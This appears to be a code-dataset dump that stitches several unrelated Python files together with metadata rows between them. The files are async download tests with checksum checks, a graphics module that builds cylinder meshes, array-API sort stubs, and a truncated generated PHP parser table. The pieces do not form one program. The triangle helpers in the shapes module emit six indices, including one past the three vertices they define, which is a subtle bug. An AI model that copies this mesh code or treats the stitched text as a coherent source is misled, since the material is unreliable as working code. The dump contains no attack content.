timeout=None,
):
download = download_mod.RawDownload(
sync_test.EXAMPLE_URL, stream=stream, end=end, headers=headers
)
transport = mock.AsyncMock(spec=["request"])
mockResponse = _mock_raw_response(chunks=chunks, headers=response_headers)
transport.request = mock.AsyncMock(spec=["__call__"], return_value=mockResponse)
assert not download.finished
ret_val = await download.consume(transport)
assert ret_val is transport.request.return_value
if chunks:
assert stream is not None
transport.request.assert_called_once_with(
"GET",
sync_test.EXAMPLE_URL,
data=None,
headers=download._headers,
timeout=EXPECTED_TIMEOUT,
)
range_bytes = "bytes={:d}-{:d}".format(0, end)
assert download._headers["range"] == range_bytes
assert download.finished
return transport
@pytest.mark.asyncio
async def test_consume(self):
await self._consume_helper()
@pytest.mark.parametrize("checksum", ["md5", "crc32c", None])
@pytest.mark.asyncio
async def test_consume_with_stream(self, checksum):
stream = io.BytesIO()
chunks = (b"up down ", b"charlie ", b"brown")
await self._consume_helper(stream=stream, chunks=chunks, checksum=checksum)
assert stream.getvalue() == b"".join(chunks)
@pytest.mark.parametrize("checksum", ["md5", "crc32c", None])
@pytest.mark.asyncio
async def test_consume_with_stream_hash_check_success(self, checksum):
stream = io.BytesIO()
chunks = (b"up down ", b"charlie ", b"brown")
header_value = "crc32c=UNIQxg==,md5=JvS1wjMvfbCXgEGeaJJLDQ=="
headers = {_helpers._HASH_HEADER: header_value}
await self._consume_helper(
stream=stream, chunks=chunks, response_headers=headers, checksum=checksum
)
assert stream.getvalue() == b"".join(chunks)
@pytest.mark.parametrize("checksum", ["md5", "crc32c"])
@pytest.mark.asyncio
async def test_consume_with_stream_hash_check_fail(self, checksum):
stream = io.BytesIO()
download = download_mod.RawDownload(
sync_test.EXAMPLE_URL, stream=stream, checksum=checksum
)
chunks = (b"zero zero", b"niner tango")
bad_checksum = "anVzdCBub3QgdGhpcyAxLA=="
header_value = "crc32c={bad},md5={bad}".format(bad=bad_checksum)
headers = {_helpers._HASH_HEADER: header_value}
transport = mock.AsyncMock(spec=["request"])
mockResponse = _mock_raw_response(chunks=chunks, headers=headers)
transport.request = mock.AsyncMock(spec=["__call__"], return_value=mockResponse)
assert not download.finished
with pytest.raises(common.DataCorruption) as exc_info:
await download.consume(transport)
assert stream.getvalue() == b"".join(chunks)
assert download.finished
assert download._headers == {}
error = exc_info.value
assert error.response is transport.request.return_value
assert len(error.args) == 1
if checksum == "md5":
good_checksum = "1A/dxEpys717C6FH7FIWDw=="
else:
good_checksum = "GvNZlg=="
msg = download_mod._CHECKSUM_MISMATCH.format(
sync_test.EXAMPLE_URL,
bad_checksum,
good_checksum,
checksum_type=checksum.upper(),
)
assert error.args[0] == msg
# Check mocks.
transport.request.assert_called_once_with(
"GET",
sync_test.EXAMPLE_URL,
data=None,
headers={},
timeout=EXPECTED_TIMEOUT,
)
@pytest.mark.asyncio
async def test_consume_with_headers(self):
headers = {} # Empty headers
end = 16383
await self._consume_helper(end=end, headers=headers)
range_bytes = "bytes={:d}-{:d}".format(0, end)
# Make sure the headers have been modified.
assert headers == {"range": range_bytes}
class TestChunkedDownload(object):
@staticmethod
def _response_content_range(start_byte, end_byte, total_bytes):
return "bytes {:d}-{:d}/{:d}".format(start_byte, end_byte, total_bytes)
def _response_headers(self, start_byte, end_byte, total_bytes):
content_length = end_byte - start_byte + 1
resp_range = self._response_content_range(start_byte, end_byte, total_bytes)
return {
"content-length": "{:d}".format(content_length),
"content-range": resp_range,
}
def _mock_response(
self, start_byte, end_byte, total_bytes, content=None, status_code=None
):
response_headers = self._response_headers(start_byte, end_byte, total_bytes)
content_stream = mock.AsyncMock(spec=["__call__", "read"])
content_stream.read = mock.AsyncMock(spec=["__call__"], return_value=content)
return mock.AsyncMock(
content=content_stream,
_headers=response_headers,
headers=response_headers,
status=status_code,
spec=["content", "headers", "status"],
)
@pytest.mark.asyncio
async def test_consume_next_chunk_already_finished(self):
download = download_mod.ChunkedDownload(sync_test.EXAMPLE_URL, 512, None)
download._finished = True
with pytest.raises(ValueError):
await download.consume_next_chunk(None)
def _mock_transport(self, start, chunk_size, total_bytes, content=b""):
transport = mock.AsyncMock(spec=["request"])
assert len(content) == chunk_size
mockResponse = self._mock_response(
start,
start + chunk_size - 1,
total_bytes,
content=content,
status_code=int(http.client.OK),
)
transport.request = mock.AsyncMock(spec=["__call__"], return_value=mockResponse)
return transport
@pytest.mark.asyncio
async def test_consume_next_chunk(self):
start = 1536
stream = io.BytesIO()
data = b"Just one chunk."
chunk_size = len(data)
download = download_mod.ChunkedDownload(
sync_test.EXAMPLE_URL, chunk_size, stream, start=start
)
total_bytes = 16384
transport = self._mock_transport(start, chunk_size, total_bytes, content=data)
# Verify the internal state before consuming a chunk.
assert not download.finished
assert download.bytes_downloaded == 0
assert download.total_bytes is None
# Actually consume the chunk and check the output.
ret_val = await download.consume_next_chunk(transport)
assert ret_val is transport.request.return_value
range_bytes = "bytes={:d}-{:d}".format(start, start + chunk_size - 1)
download_headers = {"range": range_bytes}
transport.request.assert_called_once_with(
"GET",
sync_test.EXAMPLE_URL,
data=None,
headers=download_headers,
timeout=EXPECTED_TIMEOUT,
)
assert stream.getvalue() == data
# Go back and check the internal state after consuming the chunk.
assert not download.finished
assert download.bytes_downloaded == chunk_size
assert download.total_bytes == total_bytes
@pytest.mark.asyncio
async def test_consume_next_chunk_with_custom_timeout(self):
start = 1536
stream = io.BytesIO()
data = b"Just one chunk."
chunk_size = len(data)
download = download_mod.ChunkedDownload(
sync_test.EXAMPLE_URL, chunk_size, stream, start=start
)
total_bytes = 16384
transport = self._mock_transport(start, chunk_size, total_bytes, content=data)
# Actually consume the chunk and check the output.
await download.consume_next_chunk(transport, timeout=14.7)
range_bytes = "bytes={:d}-{:d}".format(start, start + chunk_size - 1)
download_headers = {"range": range_bytes}
transport.request.assert_called_once_with(
"GET",
sync_test.EXAMPLE_URL,
data=None,
headers=download_headers,
timeout=14.7,
)
class TestRawChunkedDownload(object):
@staticmethod
def _response_content_range(start_byte, end_byte, total_bytes):
return "bytes {:d}-{:d}/{:d}".format(start_byte, end_byte, total_bytes)
def _response_headers(self, start_byte, end_byte, total_bytes):
content_length = end_byte - start_byte + 1
resp_range = self._response_content_range(start_byte, end_byte, total_bytes)
return {
"content-length": "{:d}".format(content_length),
"content-range": resp_range,
}
def _mock_response(
self, start_byte, end_byte, total_bytes, content=None, status_code=None
):
response_headers = self._response_headers(start_byte, end_byte, total_bytes)
content_stream = mock.AsyncMock(spec=["__call__", "read"])
content_stream.read = mock.AsyncMock(spec=["__call__"], return_value=content)
return mock.AsyncMock(
content=content_stream,
_headers=response_headers,
headers=response_headers,
status=status_code,
spec=["_headers", "content", "headers", "status"],
)
@pytest.mark.asyncio
async def test_consume_next_chunk_already_finished(self):
download = download_mod.RawChunkedDownload(sync_test.EXAMPLE_URL, 512, None)
download._finished = True
with pytest.raises(ValueError):
await download.consume_next_chunk(None)
def _mock_transport(self, start, chunk_size, total_bytes, content=b""):
transport = mock.AsyncMock(spec=["request"])
assert len(content) == chunk_size
mockResponse = self._mock_response(
start,
start + chunk_size - 1,
total_bytes,
content=content,
status_code=int(http.client.OK),
)
transport.request = mock.AsyncMock(spec=["__call__"], return_value=mockResponse)
return transport
@pytest.mark.asyncio
async def test_consume_next_chunk(self):
start = 1536
stream = io.BytesIO()
data = b"Just one chunk."
chunk_size = len(data)
download = download_mod.RawChunkedDownload(
sync_test.EXAMPLE_URL, chunk_size, stream, start=start
)
total_bytes = 16384
transport = self._mock_transport(start, chunk_size, total_bytes, content=data)
# Verify the internal state before consuming a chunk.
assert not download.finished
assert download.bytes_downloaded == 0
assert download.total_bytes is None
# Actually consume the chunk and check the output.
ret_val = await download.consume_next_chunk(transport)
assert ret_val is transport.request.return_value
range_bytes = "bytes={:d}-{:d}".format(start, start + chunk_size - 1)
download_headers = {"range": range_bytes}
transport.request.assert_called_once_with(
"GET",
sync_test.EXAMPLE_URL,
data=None,
headers=download_headers,
timeout=EXPECTED_TIMEOUT,
)
assert stream.getvalue() == data
# Go back and check the internal state after consuming the chunk.
assert not download.finished
assert download.bytes_downloaded == chunk_size
assert download.total_bytes == total_bytes
@pytest.mark.asyncio
async def test_consume_next_chunk_with_custom_timeout(self):
start = 1536
stream = io.BytesIO()
data = b"Just one chunk."
chunk_size = len(data)
download = download_mod.RawChunkedDownload(
sync_test.EXAMPLE_URL, chunk_size, stream, start=start
)
total_bytes = 16384
transport = self._mock_transport(start, chunk_size, total_bytes, content=data)
# Actually consume the chunk and check the output.
await download.consume_next_chunk(transport, timeout=14.7)
range_bytes = "bytes={:d}-{:d}".format(start, start + chunk_size - 1)
download_headers = {"range": range_bytes}
transport.request.assert_called_once_with(
"GET",
sync_test.EXAMPLE_URL,
data=None,
headers=download_headers,
timeout=14.7,
)
assert stream.getvalue() == data
# Go back and check the internal state after consuming the chunk.
assert not download.finished
assert download.bytes_downloaded == chunk_size
assert download.total_bytes == total_bytes
class Test__add_decoder(object):
def test_non_gzipped(self):
response_raw = mock.AsyncMock(headers={}, spec=["headers"])
md5_hash = download_mod._add_decoder(response_raw, mock.sentinel.md5_hash)
assert md5_hash is mock.sentinel.md5_hash
def test_gzipped(self):
headers = {"content-encoding": "gzip"}
response_raw = mock.AsyncMock(headers=headers, spec=["headers", "_decoder"])
md5_hash = download_mod._add_decoder(response_raw, mock.sentinel.md5_hash)
assert md5_hash is not mock.sentinel.md5_hash
assert isinstance(md5_hash, _helpers._DoNothingHash)
assert isinstance(response_raw._decoder, download_mod._GzipDecoder)
assert response_raw._decoder._checksum is mock.sentinel.md5_hash
class Test_GzipDecoder(object):
def test_constructor(self):
decoder = download_mod._GzipDecoder(mock.sentinel.md5_hash)
assert decoder._checksum is mock.sentinel.md5_hash
def test_decompress(self):
md5_hash = mock.Mock(spec=["update"])
decoder = download_mod._GzipDecoder(md5_hash)
data = b"\x1f\x8b\x08\x08"
result = decoder.decompress(data)
assert result == b""
md5_hash.update.assert_called_once_with(data)
class AsyncIter:
def __init__(self, items):
self.items = items
async def __aiter__(self):
for item in self.items:
yield item
def _mock_response(status=http.client.OK, chunks=(), headers=None):
if headers is None:
headers = {}
if chunks:
chunklist = b"".join(chunks)
stream_content = mock.AsyncMock(spec=["__call__", "read", "iter_chunked"])
stream_content.read = mock.AsyncMock(spec=["__call__"], return_value=chunklist)
stream_content.iter_chunked.return_value = AsyncIter(chunks)
mock_raw = mock.AsyncMock(headers=headers, spec=["headers"])
response = mock.AsyncMock(
_headers=headers,
headers=headers,
status=int(status),
raw=mock_raw,
content=stream_content,
spec=[
"__aenter__",
"__aexit__",
"_headers",
"iter_chunked",
"status",
"headers",
"raw",
"content",
],
)
# i.e. context manager returns ``self``.
response.__aenter__.return_value = response
response.__aexit__.return_value = None
return response
else:
return mock.AsyncMock(
_headers=headers,
headers=headers,
status=int(status),
spec=["_headers", "status", "headers"],
)
def _mock_raw_response(status_code=http.client.OK, chunks=(), headers=None):
if headers is None:
headers = {}
chunklist = b"".join(chunks)
stream_content = mock.AsyncMock(spec=["__call__", "read", "iter_chunked"])
stream_content.read = mock.AsyncMock(spec=["__call__"], return_value=chunklist)
stream_content.iter_chunked.return_value = AsyncIter(chunks)
mock_raw = mock.AsyncMock(_headers=headers, headers=headers, spec=["__call__"])
response = mock.AsyncMock(
_headers=headers,
headers=headers,
status=int(status_code),
raw=mock_raw,
content=stream_content,
spec=[
"__aenter__",
"__aexit__",
"_headers",
"iter_chunked",
"status",
"headers",
"raw",
"content",
],
)
# i.e. context manager returns ``self``.
response.__aenter__.return_value = response
response.__aexit__.return_value = None
return response
| 36.626829 | 97 | 0.640274 | 3,418 | 30,034 | 5.368637 | 0.082797 | 0.019619 | 0.024523 | 0.029428 | 0.912752 | 0.902125 | 0.898529 | 0.886649 | 0.880381 | 0.87733 | 0 | 0.01345 | 0.259839 | 30,034 | 819 | 98 | 36.671551 | 0.812011 | 0.044749 | 0 | 0.827273 | 0 | 0 | 0.089085 | 0.019122 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.022727 | false | 0 | 0.013636 | 0.00303 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
60df17ec632fc37395acfa39eba113404b86cd00 | 6,077 | py | Python | Tarea2b - CrazyRacer/local_shapes.py | Nicolas-Francisco/Computer-Graphics | 1895f3188c9ff662148a42c082a7191e2c83a06a | [
"CC-BY-4.0"
] | null | null | null | Tarea2b - CrazyRacer/local_shapes.py | Nicolas-Francisco/Computer-Graphics | 1895f3188c9ff662148a42c082a7191e2c83a06a | [
"CC-BY-4.0"
] | null | null | null | Tarea2b - CrazyRacer/local_shapes.py | Nicolas-Francisco/Computer-Graphics | 1895f3188c9ff662148a42c082a7191e2c83a06a | [
"CC-BY-4.0"
] | null | null | null | """ Local shapes module, containing the logic for creating shapes"""
import numpy as np
import basic_shapes as bs
def createColorTriangleIndexation(start_index, a, b, c, color):
# Defining locations and colors for each vertex of the shape
vertices = [
# positions colors
a[0], a[1], a[2], color[0], color[1], color[2],
b[0], b[1], b[2], color[0], color[1], color[2],
c[0], c[1], c[2], color[0], color[1], color[2]
]
# Defining connections among vertices
# We have a triangle every 3 indices specified
indices = [
start_index, start_index+1, start_index+2,
start_index+2, start_index+3, start_index
]
return (vertices, indices)
def createColorNormalsTriangleIndexation(start_index, a, b, c, color):
# Computing normal from a b c
v1 = np.array([a_v - b_v for a_v, b_v in zip(a, b)])
v2 = np.array([b_v - c_v for b_v, c_v in zip(b, c)])
v1xv2 = np.cross(v1, v2)
# Defining locations and colors for each vertex of the shape
vertices = [
# positions colors normals
a[0], a[1], a[2], color[0], color[1], color[2], v1xv2[0], v1xv2[1], v1xv2[2],
b[0], b[1], b[2], color[0], color[1], color[2], v1xv2[0], v1xv2[1], v1xv2[2],
c[0], c[1], c[2], color[0], color[1], color[2], v1xv2[0], v1xv2[1], v1xv2[2]
]
# Defining connections among vertices
# We have a triangle every 3 indices specified
indices = [
start_index, start_index+1, start_index+2,
start_index+2, start_index+3, start_index
]
return (vertices, indices)
def createColorQuadIndexation(start_index, a, b, c, d, color):
# Defining locations and colors for each vertex of the shape
vertices = [
# positions colors
a[0], a[1], a[2], color[0], color[1], color[2],
b[0], b[1], b[2], color[0], color[1], color[2],
c[0], c[1], c[2], color[0], color[1], color[2],
d[0], d[1], d[2], color[0], color[1], color[2]
]
# Defining connections among vertices
# We have a triangle every 3 indices specified
indices = [
start_index, start_index+1, start_index+2,
start_index+2, start_index+3, start_index
]
return (vertices, indices)
def createColorNormalsQuadIndexation(start_index, a, b, c, d, color):
# Computing normal from a b c
v1 = np.array(a-b)
v2 = np.array(b-c)
v1xv2 = np.cross(v1, v2)
# Defining locations and colors for each vertex of the shape
vertices = [
# positions colors normals
a[0], a[1], a[2], color[0], color[1], color[2], v1xv2[0], v1xv2[1], v1xv2[2],
b[0], b[1], b[2], color[0], color[1], color[2], v1xv2[0], v1xv2[1], v1xv2[2],
c[0], c[1], c[2], color[0], color[1], color[2], v1xv2[0], v1xv2[1], v1xv2[2],
d[0], d[1], d[2], color[0], color[1], color[2], v1xv2[0], v1xv2[1], v1xv2[2]
]
# Defining connections among vertices
# We have a triangle every 3 indices specified
indices = [
start_index, start_index+1, start_index+2,
start_index+2, start_index+3, start_index
]
return (vertices, indices)
# PAUTA
def generateCylinder(latitudes, color, R = 1.0, z_top=1.0, z_bottom=0.0):
vertices = []
indices = []
# Angle step
dtheta = 2 * np.pi / latitudes
theta = 0
start_index = 0
# We generate a rectangle for every latitude,
for _ in range(latitudes):
# d === c
# | |
# | |
# a === b
a = np.array([R*np.cos(theta), R*np.sin(theta), z_bottom])
b = np.array([R*np.cos(theta + dtheta), R*np.sin(theta + dtheta), z_bottom])
c = np.array([R*np.cos(theta + dtheta), R*np.sin(theta + dtheta), z_top])
d = np.array([R*np.cos(theta), R*np.sin(theta), z_top])
theta = theta + dtheta
_vertex, _indices = createColorQuadIndexation(start_index, a, b, c, d, color)
vertices += _vertex
indices += _indices
start_index += 4
# add top cover
theta = 0
dtheta = 2 * np.pi / 15
for _ in range(15):
# Top
a = [0, 0, z_top]
b = [R * np.cos(theta), R * np.sin(theta), z_top]
c = [R * np.cos(theta + dtheta), R * np.sin(theta + dtheta), z_top]
_vertex, _indices = createColorTriangleIndexation(start_index, a, b, c, color)
vertices += _vertex
indices += _indices
start_index += 3
theta += dtheta
return bs.Shape(vertices, indices)
# Cilindro con normales
def generateNormalsCylinder(latitudes, color, R = 1.0, z_top=1.0, z_bottom=0.0):
vertices = []
indices = []
# Angle step
dtheta = 2 * np.pi / latitudes
theta = 0
start_index = 0
# We generate a rectangle for every latitude,
for _ in range(latitudes):
# d === c
# | |
# | |
# a === b
a = np.array([R*np.cos(theta), R*np.sin(theta), z_bottom])
b = np.array([R*np.cos(theta + dtheta), R*np.sin(theta + dtheta), z_bottom])
c = np.array([R*np.cos(theta + dtheta), R*np.sin(theta + dtheta), z_top])
d = np.array([R*np.cos(theta), R*np.sin(theta), z_top])
theta = theta + dtheta
_vertex, _indices = createColorNormalsQuadIndexation(start_index, a, b, c, d, color)
vertices += _vertex
indices += _indices
start_index += 4
# add top cover
theta = 0
dtheta = 2 * np.pi / 15
for _ in range(15):
# Top
a = [0, 0, z_top]
b = [R * np.cos(theta), R * np.sin(theta), z_top]
c = [R * np.cos(theta + dtheta), R * np.sin(theta + dtheta), z_top]
_vertex, _indices = createColorNormalsTriangleIndexation(start_index, a, b, c, color)
vertices += _vertex
indices += _indices
start_index += 3
theta += dtheta
return bs.Shape(vertices, indices) | 30.691919 | 93 | 0.558828 | 886 | 6,077 | 3.73702 | 0.098194 | 0.114769 | 0.029598 | 0.05074 | 0.942616 | 0.942616 | 0.935971 | 0.888855 | 0.845968 | 0.845968 | 0 | 0.050891 | 0.298338 | 6,077 | 198 | 94 | 30.691919 | 0.72561 | 0.189896 | 0 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054545 | false | 0 | 0.018182 | 0 | 0.127273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
60f814f2683c930386abd3090da71a7f3af8d411 | 46 | py | Python | api/src/services/__init__.py | philipguedes/network-meeseeks | 67210134e4c9baa74cf403bc35c567e9b7ead7b5 | [
"MIT"
] | null | null | null | api/src/services/__init__.py | philipguedes/network-meeseeks | 67210134e4c9baa74cf403bc35c567e9b7ead7b5 | [
"MIT"
] | null | null | null | api/src/services/__init__.py | philipguedes/network-meeseeks | 67210134e4c9baa74cf403bc35c567e9b7ead7b5 | [
"MIT"
] | null | null | null | import src.services.neubot
import src.adapters | 23 | 26 | 0.869565 | 7 | 46 | 5.714286 | 0.714286 | 0.45 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065217 | 46 | 2 | 27 | 23 | 0.930233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
714f08bc4682588512523b6356b0148b1d4f24a4 | 44 | py | Python | __init__.py | camkay/cis410_library | 51c4e56f3d70a4145a9967cb2ac794f33a2493ea | [
"MIT"
] | null | null | null | __init__.py | camkay/cis410_library | 51c4e56f3d70a4145a9967cb2ac794f33a2493ea | [
"MIT"
] | null | null | null | __init__.py | camkay/cis410_library | 51c4e56f3d70a4145a9967cb2ac794f33a2493ea | [
"MIT"
] | null | null | null | from cis410_library.cis410_library import *
| 22 | 43 | 0.863636 | 6 | 44 | 6 | 0.666667 | 0.722222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 0.090909 | 44 | 1 | 44 | 44 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
715a3e81711d2c1c2ce2367d53039398212fd1ad | 2,289 | py | Python | spec/API_specification/signatures/sorting_functions.py | cnpryer/array-api | 02fa9237eab3258120778baec12cd38cfd309ee3 | [
"MIT"
] | 98 | 2020-11-10T15:24:46.000Z | 2022-03-29T02:40:54.000Z | spec/API_specification/signatures/sorting_functions.py | cnpryer/array-api | 02fa9237eab3258120778baec12cd38cfd309ee3 | [
"MIT"
] | 269 | 2020-11-10T17:29:41.000Z | 2022-03-30T15:38:47.000Z | spec/API_specification/signatures/sorting_functions.py | cnpryer/array-api | 02fa9237eab3258120778baec12cd38cfd309ee3 | [
"MIT"
] | 24 | 2020-11-10T20:53:55.000Z | 2022-03-28T01:58:12.000Z | from ._types import array
def argsort(x: array, /, *, axis: int = -1, descending: bool = False, stable: bool = True) -> array:
"""
Returns the indices that sort an array ``x`` along a specified axis.
Parameters
----------
x : array
input array.
axis: int
axis along which to sort. If set to ``-1``, the function must sort along the last axis. Default: ``-1``.
descending: bool
sort order. If ``True``, the returned indices sort ``x`` in descending order (by value). If ``False``, the returned indices sort ``x`` in ascending order (by value). Default: ``False``.
stable: bool
sort stability. If ``True``, the returned indices must maintain the relative order of ``x`` values which compare as equal. If ``False``, the returned indices may or may not maintain the relative order of ``x`` values which compare as equal (i.e., the relative order of ``x`` values which compare as equal is implementation-dependent). Default: ``True``.
Returns
-------
out : array
an array of indices. The returned array must have the same shape as ``x``. The returned array must have the default array index data type.
"""
def sort(x: array, /, *, axis: int = -1, descending: bool = False, stable: bool = True) -> array:
"""
Returns a sorted copy of an input array ``x``.
Parameters
----------
x: array
input array.
axis: int
axis along which to sort. If set to ``-1``, the function must sort along the last axis. Default: ``-1``.
descending: bool
sort order. If ``True``, the array must be sorted in descending order (by value). If ``False``, the array must be sorted in ascending order (by value). Default: ``False``.
stable: bool
sort stability. If ``True``, the returned array must maintain the relative order of ``x`` values which compare as equal. If ``False``, the returned array may or may not maintain the relative order of ``x`` values which compare as equal (i.e., the relative order of ``x`` values which compare as equal is implementation-dependent). Default: ``True``.
Returns
-------
out : array
a sorted array. The returned array must have the same data type and shape as ``x``.
"""
__all__ = ['argsort', 'sort'] | 50.866667 | 361 | 0.642202 | 331 | 2,289 | 4.425982 | 0.205438 | 0.067577 | 0.065529 | 0.07372 | 0.85529 | 0.845734 | 0.776792 | 0.734471 | 0.688055 | 0.688055 | 0 | 0.003413 | 0.231979 | 2,289 | 45 | 362 | 50.866667 | 0.82992 | 0.820882 | 0 | 0 | 0 | 0 | 0.041045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0.25 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
7178990f5d3a0aa6ca96ea59b18bdc4205863e72 | 315,411 | py | Python | Lib/site-packages/phply/parsetab.py | TencentCodeDog/win-Python-v3.7.0 | 72275357ffaa349bd4eb65242551c3dd09546367 | [
"bzip2-1.0.6"
] | null | null | null | Lib/site-packages/phply/parsetab.py | TencentCodeDog/win-Python-v3.7.0 | 72275357ffaa349bd4eb65242551c3dd09546367 | [
"bzip2-1.0.6"
] | null | null | null | Lib/site-packages/phply/parsetab.py | TencentCodeDog/win-Python-v3.7.0 | 72275357ffaa349bd4eb65242551c3dd09546367 | [
"bzip2-1.0.6"
] | null | null | null |
# parsetab.py
# This file is automatically generated. Do not edit.
_tabversion = '3.8'
_lr_method = 'LALR'
_lr_signature = 'D412AF7EB99FD2C50A0DCDF22BEEB04A'
_lr_action_items = {'HALT_COMPILER':([0,2,3,4,5,6,7,10,13,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,500,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,820,825,832,835,836,841,862,867,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,8,-3,-2,-4,-5,-6,-50,-443,-47,-443,290,-23,-48,-38,-40,-42,-443,-8,-443,8,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,290,-56,-7,8,-9,-28,-443,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,290,290,-51,-55,290,-110,-31,-64,-34,-85,-443,-443,-443,-109,-65,-71,-36,-83,-443,-443,-92,-93,-86,-87,290,-61,290,290,-443,-35,-76,-443,290,-443,290,-88,-54,-108,-32,290,290,290,-63,-84,-443,-443,-77,290,-443,290,-52,290,]),'NAMESPACE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,173,179,180,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,275,276,277,284,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,365,369,371,375,389,404,407,423,424,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,491,499,500,501,503,504,513,528,532,533,535,537,540,545,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,629,630,634,636,637,638,639,640,645,646,656,657,661,679,682,693,703,734,735,740,741,742,746,748,751,752,759,762,763,764,771,773,776,781,796,803,806,811,813,814,820,822,825,826,831,832,835,836,839,841,851,852,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,892,894,898,899,907,908,909,910,911,912,913,914,915,917,918,924,925,927,928,931,934,935,937,938,940,944,951,954,955,962,963,964,967,969,971,972,973,975,976,],[-443,11,-3,-2,-4,-5,-6,112,-50,-443,112,112,112,112,112,-47,112,211,112,112,112,112,112,112,231,231,112,112,112,112,112,112,112,112,112,112,112,112,112,112,-443,112,112,-23,112,-48,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,-38,-40,-42,231,231,-443,112,112,112,112,112,112,112,112,112,112,112,112,112,231,112,231,231,112,112,112,112,112,112,112,-8,-443,11,231,-30,-22,-24,-25,-26,112,-11,466,-12,112,112,-39,-41,-43,-44,112,-45,466,-46,112,112,-56,211,518,518,112,112,112,112,112,231,112,112,112,-7,11,-9,112,112,-28,466,466,466,466,112,112,112,112,112,112,112,231,231,-443,112,466,211,518,112,112,231,231,231,231,231,112,112,112,112,-10,-29,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,466,-443,-443,112,112,-33,-70,-443,231,-37,-49,-443,-53,-57,-60,-443,211,466,518,-111,518,112,112,112,-27,466,466,-443,-62,112,112,112,231,231,-51,-55,112,466,466,466,-110,518,231,112,112,-31,-64,112,-34,112,-85,112,518,-443,-443,-443,466,-109,466,-443,466,112,-65,-71,112,-36,-83,-443,-443,-92,-93,-86,-87,112,-61,112,112,-443,466,518,-123,112,-443,-35,-76,-443,112,-443,112,-88,-54,-108,466,518,211,466,-122,112,-32,112,112,112,211,-63,-84,-443,-443,-77,112,-443,-126,-128,112,-52,112,-127,]),'CONST':([0,2,3,4,5,6,7,10,29,114,130,164,166,168,275,276,277,285,292,295,345,346,347,348,352,355,361,441,442,443,500,519,566,613,620,621,630,634,636,637,638,639,650,654,655,657,740,741,759,762,774,776,777,811,813,820,825,841,844,862,867,869,870,877,878,882,890,893,909,910,915,917,918,935,946,951,954,963,968,973,974,977,],[-443,14,-3,-2,-4,-5,-6,-50,-47,-443,-48,-38,-40,-42,-8,-443,14,-30,-11,-12,-39,-41,-43,-44,-45,-46,-56,-7,14,-9,-443,-443,-10,-443,-33,-70,-37,-49,-443,-53,-57,-60,-443,782,-136,-111,-443,-62,-51,-55,782,-110,-135,-31,-64,-34,-85,-109,-139,-65,-71,-36,-83,-86,-87,-61,-138,-141,-35,-76,-88,-54,-108,-32,-140,-63,-84,-77,-157,-52,-137,-156,]),'USE':([0,2,3,4,5,6,7,10,29,114,130,164,166,168,275,276,277,285,292,295,345,346,347,348,352,355,361,373,441,442,443,500,519,522,523,566,613,620,621,630,634,636,637,638,639,644,650,654,655,657